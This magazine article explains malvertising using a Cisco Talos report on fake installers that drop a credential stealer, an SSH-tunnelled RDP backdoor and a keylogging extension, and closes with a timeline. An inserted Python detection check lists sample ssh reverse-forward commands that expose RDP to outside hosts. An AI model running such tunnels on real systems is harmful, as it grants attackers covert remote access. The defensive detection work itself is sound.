What is Malvertising? Cyber Magazine takes a look

According to Cisco Talos, online advertising is increasingly being used to reach victims who are searching for software to install on their systems.

Cisco Talos Intelligence Group recently observed a malware distribution campaign that tries to trick users into executing fake installers of popular software on their systems. It said it believes with moderate confidence that online advertising is used to reach potential victims who are searching for software to install on their systems.

Cyber Magazine takes a look at malvertising.

What is malvertising?

Malvertising, or malicious advertising, is the use of malicious online advertisements to spread malware and compromise systems. Generally this occurs through the injection of unwanted or malicious code into ads. Malicious actors then pay legitimate online advertising networks to display the infected ads on various websites, exposing every user visiting these sites to the potential risk of infection. Generally, the legitimate advertising networks and websites are not aware that they are serving malicious content.

Why does malvertising work?

Once the fake installers run, they execute three pieces of malware on the victim's system:

  • A password stealer that collects all the credentials available on the system.
  • A "backdoor" that sets up remote access via a stealth Microsoft Remote Desktop session by forwarding the RDP port through an SSH tunnel, allowing access to systems even when behind a firewall.
  • A malicious browser extension that contains several information-stealing features, such as keylogging and taking screenshots.

Cisco Talos' Technical Lead of Security Research, Tiago Pereira, says: "Password stealers have long presented a risk to individuals and to companies. The compromised accounts are frequently sold in underground forums and may lead to additional compromise using the stolen accounts and through password reuse. The Chrome extension adds to this risk by allowing the theft of credentials used on the web that may not be stored in the system. Additionally, the use of an SSH tunnel to forward RDP to an external server provides attackers with a reliable way to log in remotely to a system, bypassing firewall control."
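As an added detection-side example (not from the Talos report or this article), the Python check below flags process command lines that match the backdoor's tunnelling pattern described above: an ssh client started with a reverse (-R) port forward whose local target is the RDP service on port 3389. The process records it runs over are constructed samples, not real telemetry.

```python
# Detection check for the backdoor pattern above: an ssh client launched with a
# reverse (-R) port forward whose local target is the RDP service on port 3389.
import re

RDP_PORT = 3389
LOOPBACK = {"localhost", "127.0.0.1", "::1"}
# OpenSSH -R spec: [bind_address:]port:host:hostport
FORWARD_RE = re.compile(r"^(?:[^:]*:)?(\d+):([^:]+):(\d+)$")

def parse_remote_forwards(cmdline):
    """Return each -R forward in an ssh command line as a dict; [] if not ssh."""
    argv = cmdline.split()  # assumption: no quoted paths containing spaces
    exe = re.split(r"[\\/]", argv[0])[-1].lower() if argv else ""
    if not exe.startswith("ssh"):
        return []
    forwards, i = [], 1
    while i < len(argv):
        spec = None
        if argv[i] == "-R" and i + 1 < len(argv):            # "-R spec"
            i += 1
            spec = argv[i]
        elif argv[i].startswith("-R") and len(argv[i]) > 2:  # "-Rspec"
            spec = argv[i][2:]
        m = FORWARD_RE.match(spec) if spec else None
        if m:
            forwards.append({"remote_port": int(m.group(1)),
                             "local_host": m.group(2),
                             "local_port": int(m.group(3))})
        i += 1
    return forwards

def is_rdp_tunnel(cmdline):
    """True when a -R forward exposes this host's RDP port to the SSH server."""
    return any(f["local_port"] == RDP_PORT and f["local_host"] in LOOPBACK
               for f in parse_remote_forwards(cmdline))

SAMPLE_PROCESSES = [  # constructed sample command lines, not real telemetry
    "ssh -N -R 12345:localhost:3389 -i id_rsa tunnel@203.0.113.5",
    "ssh -R 8080:localhost:80 deploy@example.net",
    "ssh -L 3389:10.0.0.5:3389 admin@jump.example.net",
    r"C:\Windows\System32\OpenSSH\ssh.exe -fN -R0.0.0.0:2222:127.0.0.1:3389 -p 443 x@198.51.100.7",
    r"notepad.exe C:\Users\bob\notes.txt",
]

def find_rdp_tunnels(cmdlines):
    """Return the command lines that match the tunnelling pattern."""
    return [c for c in cmdlines if is_rdp_tunnel(c)]
```

Only the two reverse forwards that expose the local RDP port are flagged; an ordinary local forward (-L) to another host's RDP and a reverse forward of a web port are left alone.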

Malvertising timeline

According to Wikipedia, here is a timeline of malvertising activity:

2007/2008: The first recorded sighting of malvertising was in late 2007 to early 2008. This threat was based on a vulnerability in Adobe Flash and affected a number of platforms including MySpace, Excite and Rhapsody.

2009: The online edition of The New York Times Magazine was found to be serving up an ad that was part of a larger click fraud scam that created a botnet network of malware-infected computers, nicknamed the Bahama botnet, that then went on to be used to carry out click fraud on pay per click ads all over the web. 

2010: Malvertising takes off. Marketing analysts ClickZ noted that the Online Trust Alliance (OTA) identified billions of display ads, across 3,500 sites, carrying malware. In the same year the Online Trust Alliance formed a cross-industry Anti-Malvertising Task Force.

2011: Spotify had a malvertising attack.

2012: Symantec includes malvertising as a section in its Internet Security Threat Report 2013.

2013: A major malvertising campaign was waged against Yahoo.com, one of the largest ad platforms with monthly visits of 6.9 billion. 

2015: McAfee's Threat Report for February 2015 said that malvertising was growing quickly on mobile platforms.

2021: Ransomware gang REvil was spotted using paid positioning in Google search results to deliver malicious files to victims.
